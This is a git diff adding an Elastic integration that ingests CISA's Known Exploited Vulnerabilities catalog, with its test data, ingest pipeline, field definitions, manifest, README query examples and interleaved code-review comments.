@@ -0,0 +1,8 @@ +rules: + - path: /sites/default/files/feeds/known_exploited_vulnerabilities.json + methods: ["GET"] + request_headers: + Content-Type: "application/json" + responses: + - status_code: 200 + body: "{\n \"title\": \"CISA Catalog of Known Exploited Vulnerabilities\",\n \"catalogVersion\": \"2024.02.16\",\n \"dateReleased\": \"2024-02-16T19:54:05.3915Z\",\n \"count\": 1081,\n \"vulnerabilities\": [\n {\n \"cveID\":\"CVE-2020-3259\",\"vendorProject\":\"Cisco\",\"product\":\"Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD)\",\"vulnerabilityName\":\"Cisco ASA and FTD Information Disclosure Vulnerability\",\"dateAdded\":\"2024-02-15\",\"shortDescription\":\"Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) contain an information disclosure vulnerability. An attacker could retrieve memory contents on an affected device, which could lead to the disclosure of confidential information due to a buffer tracking issue when the software parses invalid URLs that are requested from the web services interface. 
This vulnerability affects only specific AnyConnect and WebVPN configurations.\",\"requiredAction\":\"Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\",\"dueDate\":\"2024-03-07\",\"knownRansomwareCampaignUse\":\"Known\",\"notes\":\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-info-disclose-9eJtycMB\"\n },\n {\n \"cveID\":\"CVE-2024-21410\",\"vendorProject\":\"Microsoft\",\"product\":\"Exchange Server\",\"vulnerabilityName\":\"Microsoft Exchange Server Privilege Escalation Vulnerability\",\"dateAdded\":\"2024-02-15\",\"shortDescription\":\"Microsoft Exchange Server contains an unspecified vulnerability that allows for privilege escalation.\",\"requiredAction\":\"Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\",\"dueDate\":\"2024-03-07\",\"knownRansomwareCampaignUse\":\"Unknown\",\"notes\":\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21410\"\n },\n { \n \"cveID\":\"CVE-2024-1709\",\"vendorProject\":\"ConnectWise\",\"product\":\"ScreenConnect\",\"vulnerabilityName\":\"ConnectWise ScreenConnect Authentication Bypass Vulnerability\",\"dateAdded\":\"2024-02-22\",\"shortDescription\":\"ConnectWise ScreenConnect contains an authentication bypass vulnerability that allows an attacker with network access to the management interface to create a new, administrator-level account on affected devices.\",\"requiredAction\":\"Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\",\"dueDate\":\"2024-02-29\",\"knownRansomwareCampaignUse\":\"Known\",\"notes\":\"https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8\"\n }\n ]\n}" diff --git a/packages/cisa_kevs/changelog.yml b/packages/cisa_kevs/changelog.yml new file mode 100644 index 00000000000..eba8459ab02 --- /dev/null +++ b/packages/cisa_kevs/changelog.yml 
@@ -0,0 +1,11 @@ +# newer versions go on top +- version: "1.0.0" + changes: + - description: Add Enrich/ES|QL Samples to Readme, make GA. + type: enhancement + link: https://github.com/elastic/integrations/pull/9492 +- version: "0.1.0" + changes: + - description: Initial draft of the package + type: enhancement + link: https://github.com/elastic/integrations/pull/9240 diff --git a/packages/cisa_kevs/data_stream/vulnerability/_dev/test/pipeline/test-cisakev-ndjson.log b/packages/cisa_kevs/data_stream/vulnerability/_dev/test/pipeline/test-cisakev-ndjson.log new file mode 100644 index 00000000000..2463f40da5a --- /dev/null +++ b/packages/cisa_kevs/data_stream/vulnerability/_dev/test/pipeline/test-cisakev-ndjson.log 
@@ -0,0 +1,3 @@ +{"cveID":"CVE-2020-3259","vendorProject":"Cisco","product":"Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD)","vulnerabilityName":"Cisco ASA and FTD Information Disclosure Vulnerability","dateAdded":"2024-02-15","shortDescription":"Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) contain an information disclosure vulnerability. An attacker could retrieve memory contents on an affected device, which could lead to the disclosure of confidential information due to a buffer tracking issue when the software parses invalid URLs that are requested from the web services interface. This vulnerability affects only specific AnyConnect and WebVPN configurations.","requiredAction":"Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.","dueDate":"2024-03-07","knownRansomwareCampaignUse":"Known","notes":"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-info-disclose-9eJtycMB"} +{"cveID":"CVE-2024-21410","vendorProject":"Microsoft","product":"Exchange Server","vulnerabilityName":"Microsoft Exchange Server Privilege Escalation Vulnerability","dateAdded":"2024-02-15","shortDescription":"Microsoft Exchange Server contains an unspecified vulnerability that allows for privilege escalation.","requiredAction":"Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.","dueDate":"2024-03-07","knownRansomwareCampaignUse":"Unknown","notes":"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21410"} +{"cveID":"CVE-2024-1709","vendorProject":"ConnectWise","product":"ScreenConnect","vulnerabilityName":"ConnectWise ScreenConnect Authentication Bypass Vulnerability","dateAdded":"2024-02-22","shortDescription":"ConnectWise ScreenConnect contains an authentication bypass vulnerability that allows an attacker with network access to the management interface to create a new, 
administrator-level account on affected devices.","requiredAction":"Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.","dueDate":"2024-02-29","knownRansomwareCampaignUse":"Known","notes":"https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8"} diff --git a/packages/cisa_kevs/data_stream/vulnerability/_dev/test/pipeline/test-cisakev-ndjson.log-expected.json b/packages/cisa_kevs/data_stream/vulnerability/_dev/test/pipeline/test-cisakev-ndjson.log-expected.json new file mode 100644 index 00000000000..7ebbac62ce9 --- /dev/null +++ b/packages/cisa_kevs/data_stream/vulnerability/_dev/test/pipeline/test-cisakev-ndjson.log-expected.json 
@@ -0,0 +1,109 @@ +{ + "expected": [ + { + "@timestamp": "2024-02-15T00:00:00.000Z", + "cisa_kev": { + "vulnerability": { + "date_added": "2024-02-15", + "due_date": "2024-03-07", + "known_ransomware_campaign_use": "Known", + "name": "Cisco ASA and FTD Information Disclosure Vulnerability", + "notes": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-info-disclose-9eJtycMB", + "product": "Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD)", + "required_action": "Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.", + "vendor_project": "Cisco" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "category": [ + "vulnerability" + ], + "kind": "enrichment", + "original": "{\"cveID\":\"CVE-2020-3259\",\"vendorProject\":\"Cisco\",\"product\":\"Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD)\",\"vulnerabilityName\":\"Cisco ASA and FTD Information Disclosure Vulnerability\",\"dateAdded\":\"2024-02-15\",\"shortDescription\":\"Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) contain an information disclosure vulnerability. An attacker could retrieve memory contents on an affected device, which could lead to the disclosure of confidential information due to a buffer tracking issue when the software parses invalid URLs that are requested from the web services interface. 
This vulnerability affects only specific AnyConnect and WebVPN configurations.\",\"requiredAction\":\"Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\",\"dueDate\":\"2024-03-07\",\"knownRansomwareCampaignUse\":\"Known\",\"notes\":\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-info-disclose-9eJtycMB\"}", + "type": [ + "info" + ] + }, + "tags": [ + "preserve_original_event" + ], + "vulnerability": { + "description": "Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) contain an information disclosure vulnerability. An attacker could retrieve memory contents on an affected device, which could lead to the disclosure of confidential information due to a buffer tracking issue when the software parses invalid URLs that are requested from the web services interface. This vulnerability affects only specific AnyConnect and WebVPN configurations.", + "id": "CVE-2020-3259" + } + }, + { + "@timestamp": "2024-02-15T00:00:00.000Z", + "cisa_kev": { + "vulnerability": { + "date_added": "2024-02-15", + "due_date": "2024-03-07", + "known_ransomware_campaign_use": "Unknown", + "name": "Microsoft Exchange Server Privilege Escalation Vulnerability", + "notes": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21410", + "product": "Exchange Server", + "required_action": "Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.", + "vendor_project": "Microsoft" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "category": [ + "vulnerability" + ], + "kind": "enrichment", + "original": "{\"cveID\":\"CVE-2024-21410\",\"vendorProject\":\"Microsoft\",\"product\":\"Exchange Server\",\"vulnerabilityName\":\"Microsoft Exchange Server Privilege Escalation Vulnerability\",\"dateAdded\":\"2024-02-15\",\"shortDescription\":\"Microsoft Exchange Server contains an unspecified vulnerability that allows 
for privilege escalation.\",\"requiredAction\":\"Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\",\"dueDate\":\"2024-03-07\",\"knownRansomwareCampaignUse\":\"Unknown\",\"notes\":\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21410\"}", + "type": [ + "info" + ] + }, + "tags": [ + "preserve_original_event" + ], + "vulnerability": { + "description": "Microsoft Exchange Server contains an unspecified vulnerability that allows for privilege escalation.", + "id": "CVE-2024-21410" + } + }, + { + "@timestamp": "2024-02-22T00:00:00.000Z", + "cisa_kev": { + "vulnerability": { + "date_added": "2024-02-22", + "due_date": "2024-02-29", + "known_ransomware_campaign_use": "Known", + "name": "ConnectWise ScreenConnect Authentication Bypass Vulnerability", + "notes": "https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8", + "product": "ScreenConnect", + "required_action": "Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.", + "vendor_project": "ConnectWise" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "category": [ + "vulnerability" + ], + "kind": "enrichment", + "original": "{\"cveID\":\"CVE-2024-1709\",\"vendorProject\":\"ConnectWise\",\"product\":\"ScreenConnect\",\"vulnerabilityName\":\"ConnectWise ScreenConnect Authentication Bypass Vulnerability\",\"dateAdded\":\"2024-02-22\",\"shortDescription\":\"ConnectWise ScreenConnect contains an authentication bypass vulnerability that allows an attacker with network access to the management interface to create a new, administrator-level account on affected devices.\",\"requiredAction\":\"Apply mitigations per vendor instructions or discontinue use of the product if mitigations are 
unavailable.\",\"dueDate\":\"2024-02-29\",\"knownRansomwareCampaignUse\":\"Known\",\"notes\":\"https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8\"}", + "type": [ + "info" + ] + }, + "tags": [ + "preserve_original_event" + ], + "vulnerability": { + "description": "ConnectWise ScreenConnect contains an authentication bypass vulnerability that allows an attacker with network access to the management interface to create a new, administrator-level account on affected devices.", + "id": "CVE-2024-1709" + } + } + ] +} \ No newline at end of file diff --git a/packages/cisa_kevs/data_stream/vulnerability/_dev/test/pipeline/test-common-config.yml b/packages/cisa_kevs/data_stream/vulnerability/_dev/test/pipeline/test-common-config.yml new file mode 100644 index 00000000000..4da22641654 --- /dev/null +++ b/packages/cisa_kevs/data_stream/vulnerability/_dev/test/pipeline/test-common-config.yml @@ -0,0 +1,3 @@ +fields: + tags: + - preserve_original_event diff --git a/packages/cisa_kevs/data_stream/vulnerability/_dev/test/system/test-default-config.yml b/packages/cisa_kevs/data_stream/vulnerability/_dev/test/system/test-default-config.yml new file mode 100644 index 00000000000..7608bf4dee4 --- /dev/null +++ b/packages/cisa_kevs/data_stream/vulnerability/_dev/test/system/test-default-config.yml @@ -0,0 +1,7 @@ +input: httpjson +service: cisakev +data_stream: + vars: + url: http://{{Hostname}}:{{Port}}/sites/default/files/feeds/known_exploited_vulnerabilities.json + preserve_original_event: true + enable_request_tracer: true diff --git a/packages/cisa_kevs/data_stream/vulnerability/agent/stream/httpjson.yml.hbs b/packages/cisa_kevs/data_stream/vulnerability/agent/stream/httpjson.yml.hbs new file mode 100644 index 00000000000..35ba1467932 --- /dev/null +++ b/packages/cisa_kevs/data_stream/vulnerability/agent/stream/httpjson.yml.hbs 
@@ -0,0 +1,42 @@
+config_version: "2"
+interval: {{interval}}
+request.method: "GET"
+{{#if enable_request_tracer}}
+request.tracer.filename: "../../logs/httpjson/http-request-trace-*.ndjson"
+request.tracer.maxbackups: 5
+{{/if}}
+
+{{#if url}}
+request.url: {{url}}
+{{/if}}
+{{#if proxy_url }}
+request.proxy_url: {{proxy_url}}
+{{/if}}
+{{#if ssl}}
+request.ssl: {{ssl}}
+{{/if}}
+{{#if http_client_timeout}}
+request.timeout: {{http_client_timeout}}
+{{/if}}
+request.transforms:
+- set:
+ target: header.Content-Type
+ value: application/json
+
+response.split:
+ target: body.vulnerabilities
+
+tags:
+{{#if preserve_original_event}}
+ - preserve_original_event
+{{/if}}
+{{#each tags as |tag i|}}
+ - {{tag}}
+{{/each}}
+{{#contains "forwarded" tags}}
+publisher_pipeline.disable_host: true
+{{/contains}}
+{{#if processors}}
+processors:
+{{processors}}
+{{/if}}
diff --git a/packages/cisa_kevs/data_stream/vulnerability/elasticsearch/ingest_pipeline/default.yml b/packages/cisa_kevs/data_stream/vulnerability/elasticsearch/ingest_pipeline/default.yml
new file mode 100644
index 00000000000..4a47dd9e240
--- /dev/null
+++ b/packages/cisa_kevs/data_stream/vulnerability/elasticsearch/ingest_pipeline/default.yml
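Review bot: The template gates the tracer on `{{#if enable_request_tracer}}`, and the system test config earlier in this diff sets `enable_request_tracer: true`, but the data stream manifest hunk at the end of this chunk (packages/cisa_kevs/data_stream/vulnerability/manifest.yml) declares no variable of that name, so the tracer block cannot render for a real policy and the system test either rejects the undeclared var or runs with tracing off — I have not checked which elastic-package does. Either remove the block and the test setting together, or declare the var in the manifest next to the others. The declaration below keeps it hidden and off by default, since the trace files persist the full request and response on the agent host and are only meant for troubleshooting.
```yaml
      - name: enable_request_tracer
        type: bool
        title: Enable request tracing
        multi: false
        required: false
        show_user: false
        description: Writes every HTTP request and response to a trace file on the agent's local filesystem for debugging; the trace contains the full exchange, so keep it disabled outside troubleshooting.
```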
@@ -0,0 +1,137 @@ +--- +description: Pipeline for parsing the CISA KEV Catalog +processors: + #################### + # Event ECS fields # + #################### + - set: + field: ecs.version + value: '8.11.0' + - set: + field: event.kind + value: enrichment + - set: + field: event.category + value: [vulnerability] + - set: + field: event.type + value: [info] + ###################### + # General ECS fields # + ###################### + - rename: + field: message + target_field: event.original + ignore_missing: true + if: ctx.event?.original == null + - json: + field: event.original + target_field: cisa_kev + - fingerprint: + fields: + - cisa_kev.cveID + target_field: "_id" + - date: + field: cisa_kev.dateAdded + formats: + - "yyyy-MM-dd" + tag: "cisa_added_date" + on_failure: + - remove: + field: cisa_kev.dateAdded + ignore_failure: true + - append: + field: error.message + value: "fail-{{{ _ingest.on_failure_processor_tag }}}" + - fail: + message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" + + ##################### + # Vulnerability ECS Fields # + ##################### + - rename: + field: cisa_kev.cveID + target_field: vulnerability.id + ignore_missing: true + - rename: + field: cisa_kev.shortDescription + target_field: vulnerability.description + ignore_missing: true + + ##################### + # CISA KEV Custom Fields # + ##################### + - rename: + field: cisa_kev.product + target_field: cisa_kev.vulnerability.product + ignore_missing: true + - rename: + field: cisa_kev.vulnerabilityName + target_field: cisa_kev.vulnerability.name + ignore_missing: true + - rename: + field: cisa_kev.notes + target_field: cisa_kev.vulnerability.notes + ignore_missing: true + - rename: + field: cisa_kev.dueDate + target_field: cisa_kev.vulnerability.due_date + ignore_missing: true + - rename: + field: 
cisa_kev.vendorProject + target_field: cisa_kev.vulnerability.vendor_project + ignore_missing: true + - rename: + field: cisa_kev.knownRansomwareCampaignUse + target_field: cisa_kev.vulnerability.known_ransomware_campaign_use + ignore_missing: true + - rename: + field: cisa_kev.requiredAction + target_field: cisa_kev.vulnerability.required_action + ignore_missing: true + - rename: + field: cisa_kev.dateAdded + target_field: cisa_kev.vulnerability.date_added + ignore_missing: true + + ###################### + # Cleanup processors # + ###################### + + - remove: + field: event.original + if: "ctx?.tags == null || !(ctx.tags.contains('preserve_original_event'))" + ignore_failure: true + ignore_missing: true + - script: + description: Remove null/empty values recursively. + lang: painless + source: |- + boolean drop(Object o) { + if (o == null || o == '') { + return true; + } else if (o instanceof Map) { + ((Map) o).values().removeIf(v -> drop(v)); + return (((Map) o).size() == 0); + } else if (o instanceof List) { + ((List) o).removeIf(v -> drop(v)); + return (((List) o).length == 0); + } + return false; + } + drop(ctx); + tag: 'Remove null/empty values recursively.' + on_failure: + - append: + field: error.message + value: "fail-{{{ _ingest.on_failure_processor_tag }}}" + - fail: + message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" + +on_failure: + - set: + field: event.kind + value: pipeline_error + - append: + field: error.message + value: '{{{ _ingest.on_failure_message }}}' diff --git a/packages/cisa_kevs/data_stream/vulnerability/fields/base-fields.yml b/packages/cisa_kevs/data_stream/vulnerability/fields/base-fields.yml new file mode 100644 index 00000000000..7c798f4534c --- /dev/null +++ b/packages/cisa_kevs/data_stream/vulnerability/fields/base-fields.yml 
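Review bot: The `fingerprint` processor derives `_id` from `cisa_kev.cveID` alone, so a later revision of the same KEV entry (the catalog does amend `dueDate`, `notes` and `knownRansomwareCampaignUse` in place) hashes to the same document id; because the target is a data stream, which accepts only create operations, that revision is rejected as a version conflict while the first copy sits in the current write index, as far as I can read this hunk. If the aim is to avoid re-indexing the unchanged feed on every poll, hash the mutable fields too — under `fields:` list `- cisa_kev.cveID`, `- cisa_kev.dueDate`, `- cisa_kev.knownRansomwareCampaignUse` and `- cisa_kev.notes` — so an amended entry lands as a new document and an unchanged one still dedups. Either way, a one-line comment above the processor stating that `_id` is overridden to dedupe the hourly re-poll would save the next reader from having to infer it.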
@@ -0,0 +1,12 @@
+- name: data_stream.type
+ type: constant_keyword
+ description: Data stream type.
+- name: data_stream.dataset
+ type: constant_keyword
+ description: Data stream dataset.
+- name: data_stream.namespace
+ type: constant_keyword
+ description: Data stream namespace.
+- name: '@timestamp'
+ type: date
+ description: Event timestamp.
diff --git a/packages/cisa_kevs/data_stream/vulnerability/fields/beats.yml b/packages/cisa_kevs/data_stream/vulnerability/fields/beats.yml
new file mode 100644
index 00000000000..3c48f1f224f
--- /dev/null
+++ b/packages/cisa_kevs/data_stream/vulnerability/fields/beats.yml
@@ -0,0 +1,3 @@
+- name: input.type
+ type: keyword
+ description: Type of Filebeat input.
diff --git a/packages/cisa_kevs/data_stream/vulnerability/fields/ecs.yml b/packages/cisa_kevs/data_stream/vulnerability/fields/ecs.yml
new file mode 100644
index 00000000000..c8f59ebea1b
--- /dev/null
+++ b/packages/cisa_kevs/data_stream/vulnerability/fields/ecs.yml
@@ -0,0 +1,24 @@
+- external: ecs
+ name: ecs.version
+- external: ecs
+ name: message
+- external: ecs
+ name: error.message
+- external: ecs
+ name: tags
+- external: ecs
+ name: event.ingested
+- external: ecs
+ name: event.kind
+- external: ecs
+ name: event.category
+- external: ecs
+ name: event.type
+- external: ecs
+ name: event.created
+- external: ecs
+ name: event.original
+- external: ecs
+ name: vulnerability.id
+- external: ecs
+ name: vulnerability.description
diff --git a/packages/cisa_kevs/data_stream/vulnerability/fields/fields.yml b/packages/cisa_kevs/data_stream/vulnerability/fields/fields.yml
new file mode 100644
index 00000000000..4400eeb0e43
--- /dev/null
+++ b/packages/cisa_kevs/data_stream/vulnerability/fields/fields.yml
@@ -0,0 +1,44 @@
+- name: cisa_kev.vulnerability
+ type: group
+ description: All fields related to the CISA Known Exploited Vulnerabilities.
+ fields:
+ - name: vendor_project
+ type: keyword
+ description: >
+ The vendor or project name for the vulnerability
+
+ - name: product
+ type: keyword
+ description: >
+ The vulnerability product
+
+ - name: name
+ type: keyword
+ description: >
+ The name of the vulnerability
+
+ - name: date_added
+ type: date
+ description: >
+ The date the vulnerability was added to the catalog in the format YYYY-MM-DD
+
+ - name: required_action
+ type: keyword
+ description: >
+ The required action to address the vulnerability
+
+ - name: due_date
+ type: date
+ description: >
+ The date the required action is due in the format YYYY-MM-DD
+
+ - name: known_ransomware_campaign_use
+ type: keyword
+ description: >
+ 'Known' if this vulnerability is known to have been leveraged as part of a ransomware campaign; 'Unknown' if CISA lacks confirmation that the vulnerability has been utilized for ransomware
+
+ - name: notes
+ type: keyword
+ description: >
+ Any additional notes about the vulnerability
+
diff --git a/packages/cisa_kevs/data_stream/vulnerability/manifest.yml b/packages/cisa_kevs/data_stream/vulnerability/manifest.yml
new file mode 100644
index 00000000000..f0ff1745714
--- /dev/null
+++ b/packages/cisa_kevs/data_stream/vulnerability/manifest.yml
@@ -0,0 +1,69 @@
+title: "CISA Known Exploited Vulnerabilities List"
+type: logs
+streams:
+ - input: httpjson
+ vars:
+ - name: url
+ type: text
+ title: CISA KEV URL Catalog API endpoint
+ multi: false
+ required: true
+ show_user: false
+ default: https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
+ - name: http_client_timeout
+ type: text
+ title: HTTP Client Timeout
+ description: Duration before declaring that the HTTP client connection has timed out. Valid time units are ns, us, ms, s, m, h.
+ multi: false
+ required: false
+ show_user: false
+ default: 30s
+ - name: proxy_url
+ type: text
+ title: Proxy URL
+ multi: false
+ required: false
+ show_user: false
+ description: URL to proxy connections in the form of http\[s\]://:@:
+ - name: interval
+ type: text
+ title: Interval
+ multi: false
+ required: true
+ show_user: true
+ default: 60m
+ - name: ssl
+ type: yaml
+ title: SSL
+ multi: false
+ required: false
+ show_user: false
+ - name: tags
+ type: text
+ title: Tags
+ multi: true
+ required: true
+ show_user: false
+ default:
+ - forwarded
+ - cisa-kev
+ - name: preserve_original_event
+ required: true
+ show_user: true
+ title: Preserve original event
+ description: Preserves a raw copy of the original event, added to the field `event.original`
+ type: bool
+ multi: false
+ default: false
+ - name: processors
+ type: yaml
+ title: Processors
+ multi: false
+ required: false
+ show_user: false
+ description: >
+ Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details.
+
+ template_path: httpjson.yml.hbs
+ title: CISA KEV Catalog logs
+ description: Collect CISA Known Exploited Vulnerability logs
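Review bot: The `url`, `interval` and `ssl` vars carry no `description`, whereas `http_client_timeout`, `proxy_url` and `processors` do, so `interval` — the only one of the three with `show_user: true` — is presented to the policy editor with no hint of its units. Add, for example, `description: Duration between requests to the CISA KEV catalog. Valid time units are ns, us, ms, s, m, h.` under `interval`, and a one-line `description` for `ssl` saying what the YAML block configures. The `proxy_url` description as printed here reads `http\[s\]://:@:` with nothing between the separators; if the placeholders were really dropped rather than lost in this rendering, restore them so the expected form is readable.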
diff --git a/packages/cisa_kevs/data_stream/vulnerability/sample_event.json b/packages/cisa_kevs/data_stream/vulnerability/sample_event.json
new file mode 100644
index 00000000000..f43c76a06c6
--- /dev/null
+++ b/packages/cisa_kevs/data_stream/vulnerability/sample_event.json
@@ -0,0 +1,61 @@
+{
+ "@timestamp": "2024-02-15T00:00:00.000Z",
+ "agent": {
+ "ephemeral_id": "39957f93-aff4-4e3f-84f0-66d18441ccd6",
+ "id": "7edf8be5-ad5d-4c57-a6bd-b86bddc66601",
+ "name": "docker-fleet-agent",
+ "type": "filebeat",
+ "version": "8.12.2"
+ },
+ "cisa_kev": {
+ "vulnerability": {
+ "date_added": "2024-02-15",
+ "due_date": "2024-03-07",
+ "known_ransomware_campaign_use": "Known",
+ "name": "Cisco ASA and FTD Information Disclosure Vulnerability",
+ "notes": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-info-disclose-9eJtycMB",
+ "product": "Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD)",
+ "required_action": "Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.",
+ "vendor_project": "Cisco"
+ }
+ },
+ "data_stream": {
+ "dataset": "cisa_kevs.vulnerability",
+ "namespace": "ep",
+ "type": "logs"
+ },
+ "ecs": {
+ "version": "8.11.0"
+ },
+ "elastic_agent": {
+ "id": "7edf8be5-ad5d-4c57-a6bd-b86bddc66601",
+ "snapshot": false,
+ "version": "8.12.2"
+ },
+ "event": {
+ "agent_id_status": "verified",
+ "category": [
+ "vulnerability"
+ ],
+ "created": "2024-03-13T01:01:09.893Z",
+ "dataset": "cisa_kevs.vulnerability",
+ "ingested": "2024-03-13T01:01:21Z",
+ "kind": "enrichment",
+ "original": "{\"cveID\":\"CVE-2020-3259\",\"dateAdded\":\"2024-02-15\",\"dueDate\":\"2024-03-07\",\"knownRansomwareCampaignUse\":\"Known\",\"notes\":\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-info-disclose-9eJtycMB\",\"product\":\"Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD)\",\"requiredAction\":\"Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\",\"shortDescription\":\"Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) contain an information disclosure vulnerability. 
An attacker could retrieve memory contents on an affected device, which could lead to the disclosure of confidential information due to a buffer tracking issue when the software parses invalid URLs that are requested from the web services interface. This vulnerability affects only specific AnyConnect and WebVPN configurations.\",\"vendorProject\":\"Cisco\",\"vulnerabilityName\":\"Cisco ASA and FTD Information Disclosure Vulnerability\"}",
+ "type": [
+ "info"
+ ]
+ },
+ "input": {
+ "type": "httpjson"
+ },
+ "tags": [
+ "preserve_original_event",
+ "forwarded",
+ "cisa-kev"
+ ],
+ "vulnerability": {
+ "description": "Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) contain an information disclosure vulnerability. An attacker could retrieve memory contents on an affected device, which could lead to the disclosure of confidential information due to a buffer tracking issue when the software parses invalid URLs that are requested from the web services interface. This vulnerability affects only specific AnyConnect and WebVPN configurations.",
+ "id": "CVE-2020-3259"
+ }
+}
\ No newline at end of file
diff --git a/packages/cisa_kevs/docs/README.md b/packages/cisa_kevs/docs/README.md
new file mode 100644
index 00000000000..662f82be7aa
--- /dev/null
+++ b/packages/cisa_kevs/docs/README.md
@@ -0,0 +1,141 @@
+# CISA KEV integration
+
+This integration is for [CISA KEV](https://www.cisa.gov/known-exploited-vulnerabilities-catalog) logs. This data can be useful for current awareness of Known Exploited Vulnerabilities according to CISA and also for enriching other vulnerability scan data in the Elastic stack. The integration periodically checks for the latest CISA KEV list. It includes the following datasets for retrieving logs from the CISA KEV website:
+
+- `vulnerability` dataset: Supports vulnerabilities classified as known exploited from CISA.
+
+### Example Enrich Policy and ES|QL Correlation Query
+
+An enrich policy can be created to have other vulnerability information be enriched based on the CVE number.
+
+The following requests can be used to create and execute the enrich policy after the integration has been installed:
+
+```
+PUT /_enrich/policy/enrich_cve_with_context_cisa_kev
+{
+ "match": {
+ "indices": ".ds-logs-cisa_kevs.vulnerability-*",
+ "match_field": "vulnerability.id",
+ "enrich_fields": ["cisa_kev.vulnerability.date_added", "cisa_kev.vulnerability.due_date", "cisa_kev.vulnerability.known_ransomware_campaign_use", "cisa_kev.vulnerability.name", "cisa_kev.vulnerability.notes","cisa_kev.vulnerability.product","cisa_kev.vulnerability.required_action","cisa_kev.vulnerability.vendor_project"]
+ }
+}
+
+PUT /_enrich/policy/enrich_cve_with_context_cisa_kev/_execute
+```
+
+Here is an example ES|QL query that uses the index pattern of logs-nessus.vulnerability* to enrich the data source with CISA KEV information and keeping the top 10 results. 
Note, the enrich policy (shown above) must be created first:
+
+```
+from logs-nessus.vulnerability*
+| where vulnerability.id IS NOT NULL
+| keep vulnerability.*, nessus.plugin.name, host.name
+| enrich enrich_cve_with_context_cisa_kev with cisa_kev.vulnerability.due_date, cisa_kev.vulnerability.known_ransomware_campaign_use, cisa_kev.vulnerability.name, cisa_kev.vulnerability.notes, cisa_kev.vulnerability.product, cisa_kev.vulnerability.required_action, cisa_kev.vulnerability.vendor_project, cisa_kev.vulnerability.date_added
+| where cisa_kev.vulnerability.name IS NOT NULL
+| stats count = COUNT(host.name) BY nessus.plugin.name, vulnerability.severity, cisa_kev.vulnerability.date_added, cisa_kev.vulnerability.product
+| sort count desc
+| keep nessus.plugin.name, vulnerability.severity, cisa_kev.vulnerability.product, cisa_kev.vulnerability.date_added, count
+| limit 10
+```
+
+## Logs
+
+### Vulnerabilities
+
+The CISA KEV data_stream retrieves vulnerability information from the endpoint `https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json`. 
+
+An example event for `vulnerability` looks as following:
+
+```json
+{
+ "@timestamp": "2024-02-15T00:00:00.000Z",
+ "agent": {
+ "ephemeral_id": "39957f93-aff4-4e3f-84f0-66d18441ccd6",
+ "id": "7edf8be5-ad5d-4c57-a6bd-b86bddc66601",
+ "name": "docker-fleet-agent",
+ "type": "filebeat",
+ "version": "8.12.2"
+ },
+ "cisa_kev": {
+ "vulnerability": {
+ "date_added": "2024-02-15",
+ "due_date": "2024-03-07",
+ "known_ransomware_campaign_use": "Known",
+ "name": "Cisco ASA and FTD Information Disclosure Vulnerability",
+ "notes": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-info-disclose-9eJtycMB",
+ "product": "Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD)",
+ "required_action": "Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.",
+ "vendor_project": "Cisco"
+ }
+ },
+ "data_stream": {
+ "dataset": "cisa_kevs.vulnerability",
+ "namespace": "ep",
+ "type": "logs"
+ },
+ "ecs": {
+ "version": "8.11.0"
+ },
+ "elastic_agent": {
